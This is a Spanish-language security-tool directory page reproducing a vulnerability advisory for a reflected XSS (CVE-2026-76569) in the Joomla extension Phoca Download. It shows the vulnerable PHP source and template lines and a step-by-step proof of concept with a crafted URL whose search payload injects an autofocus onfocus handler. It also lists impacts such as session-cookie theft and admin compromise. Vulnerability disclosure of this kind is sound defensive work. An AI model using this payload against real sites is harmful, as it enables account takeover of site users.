Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-76569 — Reflejo de XSS a través del parámetro GET de búsqueda en Phoca Download | Kitploit
Herramientas/GitHubGitHub/toanln-cov/cve-2026-76569
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

Reflejo de XSS a través del parámetro GET de búsqueda en Phoca Download

Ver Repositorio
hace 17h 15mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

XSS Reflejado mediante el Parámetro GET search en Phoca Download

Phoca Download ≤ 6.1.4 — Un atacante autenticado ejecuta JavaScript arbitrario mediante una URL de búsqueda manipulada en el Panel de Control de Usuario

CVE CVSS v4.0 CWE-79 Affected Researcher


RESUMEN

Phoca Download (com_phocadownload) para Joomla contiene una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en la funcionalidad de búsqueda de archivos del Panel de Control de Usuario. El parámetro GET search se procesa con el filtro de Joomla — que solo llama a y conserva el carácter — y luego se muestra sin dentro de un atributo HTML . Un atacante puede inyectar atributos HTML arbitrarios y manejadores de eventos que se ejecutan en el navegador de la víctima al cargar la página, sin requerir ninguna interacción del usuario más allá de hacer clic en un enlace manipulado.

'string'
strip_tags()
"
htmlspecialchars()
<input value="">

VERSIONES AFECTADAS

COMPONENTEVULNERABLEPROBADO ENCORREGIDO
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

DETALLES DE LA VULNERABILIDAD

Tipo: Cross-Site Scripting reflejado (CWE-79) Autenticación requerida: Usuario de Joomla registrado (con sesión iniciada) + Panel de Control de Usuario habilitado (enable_user_cp = 1) Token CSRF requerido: No requerido — solicitud GET, no se verifica token CSRF en esta ruta Archivo sumidero: site/views/user/tmpl/default_files_bootstrap.php

Causa raíz

El parámetro search se lee utilizando el filtro 'string' de Joomla, que solo llama a strip_tags(). Esto conserva el carácter ", lo que permite a un atacante salir del contexto del atributo value="" e inyectar atributos HTML arbitrarios.

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — FUENTE

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // almacenado sin codificación

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — SUMIDERO (VULNERABLE)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

La vista hermana phocadownloadlinkfile (misma extensión) aplica correctamente PhocaDownloadUtils::filterValue($search, 'text') — equivalente a htmlspecialchars() — para el mismo campo de búsqueda. La vista user no aplica la misma protección, lo que indica una codificación de salida inconsistente dentro de la extensión.


PRUEBA DE CONCEPTO

1. Iniciar sesión como Usuario Registrado

Navegue a la página de inicio de sesión de Joomla y autentíquese como usuario Registrado. Después de un inicio de sesión exitoso, Joomla redirige a la página de perfil del usuario, confirmando una sesión activa.

Inicio de sesión exitoso como testuser — redirigido a la página de perfil

2. Acceder al Panel de Control de Usuario (Estado base)

Navegue al Panel de Control de Usuario de PhocaDownload:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

La página se renderiza con un campo de búsqueda vacío (value=""). Este es el estado normal antes de la inyección.

Panel de Control de Usuario — campo de búsqueda vacío, estado base

3. Enviar URL Manipulada con Payload XSS

Navegue a la siguiente URL manipulada (o escriba el payload sin procesar directamente en el cuadro de búsqueda):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

URL manipulada con payload XSS enviada al parámetro de búsqueda

Al cargar la página, el atributo autofocus inyectado enfoca el elemento de entrada, activando inmediatamente el manejador de eventos onfocus. No se requiere ninguna interacción adicional del usuario.

HTML renderizado (vulnerable):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

IMPACTO

  1. Secuestro de sesión — Un atacante puede robar la cookie de sesión de Joomla de la víctima mediante document.cookie, lo que permite la toma completa de la cuenta sin credenciales.
  2. Ejecución arbitraria de JavaScript — Cualquier JavaScript se ejecuta en la sesión del navegador de la víctima — keylogging, manipulación del DOM, recolección de credenciales y redirecciones a páginas de phishing son todas posibles.
  3. Escalada de privilegios — Si un administrador hace clic en el enlace manipulado mientras está autenticado, el atacante obtiene ejecución de JavaScript a nivel de administrador, lo que potencialmente permite el compromiso total del sitio mediante acciones del panel administrativo.

REFERENCIAS

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • Aviso de GitHub: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • Repositorio del proveedor: https://github.com/PhocaDesign/PhocaDownload
Descargar herramienta